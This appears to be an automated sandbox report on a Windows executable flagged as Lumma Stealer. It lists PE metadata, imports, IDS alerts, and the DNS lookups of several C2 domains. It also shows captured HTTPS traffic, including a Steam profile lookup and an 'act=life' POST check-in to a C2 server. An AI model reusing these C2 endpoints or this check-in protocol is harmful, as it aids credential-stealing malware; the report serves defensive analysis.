IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2e68	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x190	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3eef2	0x3f000	5c1f461e31bdffa49737defb41a1c734	False	0.8685477120535714	data	7.787200466490556	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x40000	0xabe8	0x6000	62de819611632f27e4963e56953bdd3a	False	0.0816650390625	data	0.9759328259655915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4b000	0xc9d8	0x3a00	99759cc1196aff253479b9becbe59c2b	False	0.4502289870689655	data	4.083246287014423	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4b1e0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.29147465437788017
RT_ICON	0x4b1e0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.29147465437788017
RT_ICON	0x4b8a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	India	0.4403526970954357
RT_ICON	0x4b8a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	Sri Lanka	0.4403526970954357
RT_ICON	0x4de50	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	India	0.7943262411347518
RT_ICON	0x4de50	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	Sri Lanka	0.7943262411347518
RT_STRING	0x4e540	0x496	data	Tamil	India	0.444633730834753
RT_STRING	0x4e540	0x496	data	Tamil	Sri Lanka	0.444633730834753
RT_ACCELERATOR	0x4e2e8	0x50	data	Tamil	India	0.825
RT_ACCELERATOR	0x4e2e8	0x50	data	Tamil	Sri Lanka	0.825
RT_GROUP_ICON	0x4e2b8	0x30	data	Tamil	India	0.9375
RT_GROUP_ICON	0x4e2b8	0x30	data	Tamil	Sri Lanka	0.9375
RT_VERSION	0x4e338	0x204	data			0.5387596899224806

Imports

DLL

Import

KERNEL32.dll

EnumCalendarInfoA, WriteConsoleInputW, SetComputerNameExA, GetConsoleAliasExesLengthA, InterlockedDecrement, GetCurrentProcess, GetLogicalDriveStringsW, InterlockedCompareExchange, GetComputerNameW, GetModuleHandleW, GetCommConfig, EnumCalendarInfoExW, EnumTimeFormatsA, LoadLibraryW, CopyFileW, FindNextVolumeW, CreateSemaphoreA, VerifyVersionInfoA, FindNextVolumeMountPointW, GetShortPathNameA, LCMapStringA, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, GetTempFileNameA, GetAtomNameA, LoadLibraryA, InterlockedExchangeAdd, GlobalUnWire, FreeEnvironmentStringsW, EnumDateFormatsW, OpenEventW, SetCalendarInfoA, GetVersionExA, ReadConsoleInputW, TerminateJobObject, GetCurrentProcessId, SetFileAttributesW, GetCommandLineA, GetStartupInfoA, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, MultiByteToWideChar, ReadFile, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, SetFilePointer, CloseHandle, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, RtlUnwind, RaiseException, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, SetStdHandle, InitializeCriticalSectionAndSpinCount, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetModuleHandleA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, HeapSize, CreateFileA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-24T09:00:30.188277+0100	2058285	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spellshagey .biz)	1	192.168.2.4	54829	1.1.1.1	53	UDP
2024-12-24T09:00:30.424242+0100	2058222	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)	1	192.168.2.4	51225	1.1.1.1	53	UDP
2024-12-24T09:00:30.667819+0100	2058214	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)	1	192.168.2.4	63025	1.1.1.1	53	UDP
2024-12-24T09:00:30.892380+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.4	63445	1.1.1.1	53	UDP
2024-12-24T09:00:31.120258+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.4	63497	1.1.1.1	53	UDP
2024-12-24T09:00:31.380074+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.4	61400	1.1.1.1	53	UDP
2024-12-24T09:00:31.718284+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.4	65061	1.1.1.1	53	UDP
2024-12-24T09:00:32.023772+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.4	53709	1.1.1.1	53	UDP
2024-12-24T09:00:32.332930+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.4	50668	1.1.1.1	53	UDP
2024-12-24T09:00:34.187134+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	23.55.153.106	443	TCP
2024-12-24T09:00:35.224872+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49730	23.55.153.106	443	TCP
2024-12-24T09:00:36.851198+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-24T09:00:37.714573+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-24T09:00:37.714573+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-24T09:00:38.159835+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	172.67.157.254	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 09:00:32.786505938 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:32.786561012 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:32.786653042 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:32.789518118 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:32.789530039 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:34.187062025 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:34.187134027 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:34.199148893 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:34.199172974 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:34.199712038 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:34.253467083 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:34.537055016 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:34.579336882 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:35.224931002 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:35.224966049 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:35.224975109 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:35.225049973 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:35.225080013 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:35.225142002 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:35.225199938 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:35.225255013 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:35.225255013 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:35.225255013 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:35.225255013 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:35.404536963 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:35.404616117 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:35.404659033 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:35.404721022 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:35.404783010 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:35.438071966 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:35.438147068 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:35.438297033 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:35.438299894 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:35.438368082 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:35.440367937 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:35.440407991 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:35.440433979 CET	49730	443	192.168.2.4	23.55.153.106
Dec 24, 2024 09:00:35.440448999 CET	443	49730	23.55.153.106	192.168.2.4
Dec 24, 2024 09:00:35.629703999 CET	49731	443	192.168.2.4	172.67.157.254
Dec 24, 2024 09:00:35.629749060 CET	443	49731	172.67.157.254	192.168.2.4
Dec 24, 2024 09:00:35.629837990 CET	49731	443	192.168.2.4	172.67.157.254
Dec 24, 2024 09:00:35.630245924 CET	49731	443	192.168.2.4	172.67.157.254
Dec 24, 2024 09:00:35.630259037 CET	443	49731	172.67.157.254	192.168.2.4
Dec 24, 2024 09:00:36.851098061 CET	443	49731	172.67.157.254	192.168.2.4
Dec 24, 2024 09:00:36.851197958 CET	49731	443	192.168.2.4	172.67.157.254
Dec 24, 2024 09:00:36.921086073 CET	49731	443	192.168.2.4	172.67.157.254
Dec 24, 2024 09:00:36.921134949 CET	443	49731	172.67.157.254	192.168.2.4
Dec 24, 2024 09:00:36.921617031 CET	443	49731	172.67.157.254	192.168.2.4
Dec 24, 2024 09:00:36.964765072 CET	49731	443	192.168.2.4	172.67.157.254
Dec 24, 2024 09:00:36.964766026 CET	49731	443	192.168.2.4	172.67.157.254
Dec 24, 2024 09:00:36.964972019 CET	443	49731	172.67.157.254	192.168.2.4
Dec 24, 2024 09:00:37.714592934 CET	443	49731	172.67.157.254	192.168.2.4
Dec 24, 2024 09:00:37.714703083 CET	443	49731	172.67.157.254	192.168.2.4
Dec 24, 2024 09:00:37.714885950 CET	49731	443	192.168.2.4	172.67.157.254
Dec 24, 2024 09:00:37.715069056 CET	49731	443	192.168.2.4	172.67.157.254
Dec 24, 2024 09:00:37.715086937 CET	443	49731	172.67.157.254	192.168.2.4
Dec 24, 2024 09:00:37.715107918 CET	49731	443	192.168.2.4	172.67.157.254
Dec 24, 2024 09:00:37.715112925 CET	443	49731	172.67.157.254	192.168.2.4
Dec 24, 2024 09:00:37.795020103 CET	49732	443	192.168.2.4	172.67.157.254
Dec 24, 2024 09:00:37.795106888 CET	443	49732	172.67.157.254	192.168.2.4
Dec 24, 2024 09:00:37.795193911 CET	49732	443	192.168.2.4	172.67.157.254
Dec 24, 2024 09:00:37.795479059 CET	49732	443	192.168.2.4	172.67.157.254
Dec 24, 2024 09:00:37.795505047 CET	443	49732	172.67.157.254	192.168.2.4
Dec 24, 2024 09:00:38.159835100 CET	49732	443	192.168.2.4	172.67.157.254

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 09:00:30.188277006 CET	54829	53	192.168.2.4	1.1.1.1
Dec 24, 2024 09:00:30.420542955 CET	53	54829	1.1.1.1	192.168.2.4
Dec 24, 2024 09:00:30.424242020 CET	51225	53	192.168.2.4	1.1.1.1
Dec 24, 2024 09:00:30.645889044 CET	53	51225	1.1.1.1	192.168.2.4
Dec 24, 2024 09:00:30.667819023 CET	63025	53	192.168.2.4	1.1.1.1
Dec 24, 2024 09:00:30.889369965 CET	53	63025	1.1.1.1	192.168.2.4
Dec 24, 2024 09:00:30.892379999 CET	63445	53	192.168.2.4	1.1.1.1
Dec 24, 2024 09:00:31.115942001 CET	53	63445	1.1.1.1	192.168.2.4
Dec 24, 2024 09:00:31.120258093 CET	63497	53	192.168.2.4	1.1.1.1
Dec 24, 2024 09:00:31.340892076 CET	53	63497	1.1.1.1	192.168.2.4
Dec 24, 2024 09:00:31.380074024 CET	61400	53	192.168.2.4	1.1.1.1
Dec 24, 2024 09:00:31.602336884 CET	53	61400	1.1.1.1	192.168.2.4
Dec 24, 2024 09:00:31.718283892 CET	65061	53	192.168.2.4	1.1.1.1
Dec 24, 2024 09:00:32.021883011 CET	53	65061	1.1.1.1	192.168.2.4
Dec 24, 2024 09:00:32.023772001 CET	53709	53	192.168.2.4	1.1.1.1
Dec 24, 2024 09:00:32.331623077 CET	53	53709	1.1.1.1	192.168.2.4
Dec 24, 2024 09:00:32.332930088 CET	50668	53	192.168.2.4	1.1.1.1
Dec 24, 2024 09:00:32.639238119 CET	53	50668	1.1.1.1	192.168.2.4
Dec 24, 2024 09:00:32.642256021 CET	62041	53	192.168.2.4	1.1.1.1
Dec 24, 2024 09:00:32.781111002 CET	53	62041	1.1.1.1	192.168.2.4
Dec 24, 2024 09:00:35.442826033 CET	57869	53	192.168.2.4	1.1.1.1
Dec 24, 2024 09:00:35.628635883 CET	53	57869	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 09:00:30.188277006 CET	192.168.2.4	1.1.1.1	0x3951	Standard query (0)	spellshagey.biz	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:30.424242020 CET	192.168.2.4	1.1.1.1	0xb36c	Standard query (0)	immureprech.biz	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:30.667819023 CET	192.168.2.4	1.1.1.1	0x900e	Standard query (0)	deafeninggeh.biz	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:30.892379999 CET	192.168.2.4	1.1.1.1	0x5c79	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:31.120258093 CET	192.168.2.4	1.1.1.1	0xfbb5	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:31.380074024 CET	192.168.2.4	1.1.1.1	0xda9b	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:31.718283892 CET	192.168.2.4	1.1.1.1	0xcf98	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:32.023772001 CET	192.168.2.4	1.1.1.1	0xa17a	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:32.332930088 CET	192.168.2.4	1.1.1.1	0xfdfe	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:32.642256021 CET	192.168.2.4	1.1.1.1	0x3229	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:35.442826033 CET	192.168.2.4	1.1.1.1	0x81f4	Standard query (0)	lev-tolstoi.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 09:00:30.420542955 CET	1.1.1.1	192.168.2.4	0x3951	Name error (3)	spellshagey.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:30.645889044 CET	1.1.1.1	192.168.2.4	0xb36c	Name error (3)	immureprech.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:30.889369965 CET	1.1.1.1	192.168.2.4	0x900e	Name error (3)	deafeninggeh.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:31.115942001 CET	1.1.1.1	192.168.2.4	0x5c79	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:31.340892076 CET	1.1.1.1	192.168.2.4	0xfbb5	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:31.602336884 CET	1.1.1.1	192.168.2.4	0xda9b	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:32.021883011 CET	1.1.1.1	192.168.2.4	0xcf98	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:32.331623077 CET	1.1.1.1	192.168.2.4	0xa17a	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:32.639238119 CET	1.1.1.1	192.168.2.4	0xfdfe	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:32.781111002 CET	1.1.1.1	192.168.2.4	0x3229	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:35.628635883 CET	1.1.1.1	192.168.2.4	0x81f4	No error (0)	lev-tolstoi.com		172.67.157.254	A (IP address)	IN (0x0001)	false
Dec 24, 2024 09:00:35.628635883 CET	1.1.1.1	192.168.2.4	0x81f4	No error (0)	lev-tolstoi.com		104.21.66.86	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

lev-tolstoi.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	23.55.153.106	443	1436	C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 08:00:34 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-24 08:00:35 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 24 Dec 2024 08:00:34 GMT Content-Length: 35121 Connection: close Set-Cookie: sessionid=d2d35398eb3e69ed372c485f; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-24 08:00:35 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-24 08:00:35 UTC	10097	IN	Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09 Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-24 08:00:35 UTC	10545	IN	Data Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 Data Ascii: NIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":"htt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	172.67.157.254	443	1436	C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 08:00:36 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lev-tolstoi.com
2024-12-24 08:00:36 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-24 08:00:37 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 08:00:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=reckhmmgtqdhta42enctgttbe1; expires=Sat, 19 Apr 2025 01:47:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V7LA2psd%2B8dwWcpRyHv5yYo9Ifhw%2F4WsOzwZVRUL1pVhdfrJh1lFfIJGB8WBVyMgIqauktudtYdNJ%2FyzojLqrmUGwNMwOQhKDqABD7urlfoL2KacAlWC%2BEmM0dQl%2FqdvKCs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6f0f080a30de96-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1445&min_rtt=1440&rtt_var=551&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1965006&cwnd=224&unsent_bytes=0&cid=c7760ed8a193cbc6&ts=877&x=0"
2024-12-24 08:00:37 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-24 08:00:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:00:28
Start date:	24/12/2024
Path:	C:\Users\user\Desktop\L5Kgf2Tvkc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\L5Kgf2Tvkc.exe"
Imagebase:	0x400000
File size:	298'496 bytes
MD5 hash:	607558AB24E139B427BDC194AE34157C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2043604722.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:00:38
Start date:	24/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1656
Imagebase:	0x470000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:00:39
Start date:	24/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1740
Imagebase:	0x470000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
